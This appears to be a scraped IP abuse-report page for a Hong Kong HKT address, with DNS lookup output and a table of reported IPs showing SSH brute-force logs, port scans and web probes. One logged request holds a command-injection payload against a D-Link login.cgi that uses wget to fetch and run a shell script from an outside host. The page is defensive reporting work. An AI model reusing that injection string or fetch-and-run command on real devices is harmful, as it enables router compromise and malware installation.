City: unknown
Region: unknown
Country: Hong Kong
Internet Service Provider: Hong Kong Telecommunications (HKT) Limited
Hostname: unknown
Organization: unknown
Usage Type: unknown
| Type | Details | Datetime |
|---|---|---|
| attackspam | Unauthorized connection attempt detected from IP address 42.2.252.141 to port 5555 [J] |
2020-01-28 06:08:38 |
| IP | Type | Details | Datetime |
|---|---|---|---|
| 42.2.252.42 | attack | Unauthorized connection attempt detected from IP address 42.2.252.42 to port 5555 [J] |
2020-02-06 05:43:35 |
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.2.252.141
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2146
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;42.2.252.141. IN A
;; AUTHORITY SECTION:
. 484 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2020012701 1800 900 604800 86400
;; Query time: 115 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Jan 28 06:08:35 CST 2020
;; MSG SIZE rcvd: 116141.252.2.42.in-addr.arpa domain name pointer 42-2-252-141.static.netvigator.com.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
141.252.2.42.in-addr.arpa name = 42-2-252-141.static.netvigator.com.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 153.121.46.53 | attackspambots | Jul 26 21:10:34 keyhelp sshd[6360]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=153.121.46.53 user=r.r Jul 26 21:10:37 keyhelp sshd[6360]: Failed password for r.r from 153.121.46.53 port 59258 ssh2 Jul 26 21:10:37 keyhelp sshd[6360]: Received disconnect from 153.121.46.53 port 59258:11: Bye Bye [preauth] Jul 26 21:10:37 keyhelp sshd[6360]: Disconnected from 153.121.46.53 port 59258 [preauth] Jul 27 05:05:48 keyhelp sshd[5596]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=153.121.46.53 user=r.r Jul 27 05:05:50 keyhelp sshd[5596]: Failed password for r.r from 153.121.46.53 port 57610 ssh2 Jul 27 05:05:50 keyhelp sshd[5596]: Received disconnect from 153.121.46.53 port 57610:11: Bye Bye [preauth] Jul 27 05:05:50 keyhelp sshd[5596]: Disconnected from 153.121.46.53 port 57610 [preauth] Jul 27 05:10:59 keyhelp sshd[6617]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 t........ ------------------------------- |
2019-07-27 19:29:54 |
| 223.202.201.138 | attackbotsspam | 2019-07-27T10:20:02.820981abusebot-6.cloudsearch.cf sshd\[28893\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.202.201.138 user=root |
2019-07-27 18:46:25 |
| 185.94.111.1 | attackbotsspam | Multiport scan : 11 ports scanned 17 19 53 111 123 137 161 389 520 1900 11211 |
2019-07-27 18:34:53 |
| 216.218.206.99 | attackspam | 3389BruteforceFW23 |
2019-07-27 19:09:56 |
| 123.201.52.238 | attack | Automatic report - Port Scan Attack |
2019-07-27 18:36:49 |
| 52.174.192.252 | attackspam | 590 attacks on PHP URLs: 52.174.192.252 - - [26/Jul/2019:12:41:01 +0100] "POST /index.php HTTP/1.1" 403 9 |
2019-07-27 18:54:10 |
| 188.166.235.171 | attackspambots | Jul 27 10:45:24 [munged] sshd[3328]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.166.235.171 user=root Jul 27 10:45:26 [munged] sshd[3328]: Failed password for root from 188.166.235.171 port 38252 ssh2 |
2019-07-27 19:21:48 |
| 24.206.16.94 | attackspambots | TCP port 23 (Telnet) attempt blocked by firewall. [2019-07-27 07:04:45] |
2019-07-27 18:43:08 |
| 95.10.54.17 | attack | Automatic report - Port Scan Attack |
2019-07-27 18:40:12 |
| 86.57.237.88 | attackspam | Jul 26 23:51:59 aat-srv002 sshd[15330]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=86.57.237.88 Jul 26 23:52:01 aat-srv002 sshd[15330]: Failed password for invalid user baobao from 86.57.237.88 port 37108 ssh2 Jul 27 00:06:25 aat-srv002 sshd[16025]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=86.57.237.88 Jul 27 00:06:27 aat-srv002 sshd[16025]: Failed password for invalid user !nokia!11 from 86.57.237.88 port 50076 ssh2 ... |
2019-07-27 18:47:59 |
| 151.52.50.241 | attackspam | 1 attack on wget probes like: 151.52.50.241 - - [26/Jul/2019:17:51:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://188.165.179.15/rep/dlink.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 11 |
2019-07-27 18:51:30 |
| 62.234.109.155 | attackbots | ssh failed login |
2019-07-27 18:42:37 |
| 188.35.187.50 | attackbots | Jul 27 11:36:54 mail sshd\[19001\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.35.187.50 user=root Jul 27 11:36:56 mail sshd\[19001\]: Failed password for root from 188.35.187.50 port 56324 ssh2 Jul 27 11:41:08 mail sshd\[19551\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.35.187.50 user=root Jul 27 11:41:10 mail sshd\[19551\]: Failed password for root from 188.35.187.50 port 48872 ssh2 Jul 27 11:45:29 mail sshd\[20098\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.35.187.50 user=root |
2019-07-27 19:07:13 |
| 95.90.229.253 | attackspam | Autoban 95.90.229.253 AUTH/CONNECT |
2019-07-27 18:56:09 |
| 125.22.76.76 | attackbotsspam | Jul 27 09:16:15 OPSO sshd\[7466\]: Invalid user deltaforce from 125.22.76.76 port 37429 Jul 27 09:16:15 OPSO sshd\[7466\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=125.22.76.76 Jul 27 09:16:17 OPSO sshd\[7466\]: Failed password for invalid user deltaforce from 125.22.76.76 port 37429 ssh2 Jul 27 09:21:39 OPSO sshd\[8290\]: Invalid user zxc123 from 125.22.76.76 port 39308 Jul 27 09:21:39 OPSO sshd\[8290\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=125.22.76.76 |
2019-07-27 18:50:01 |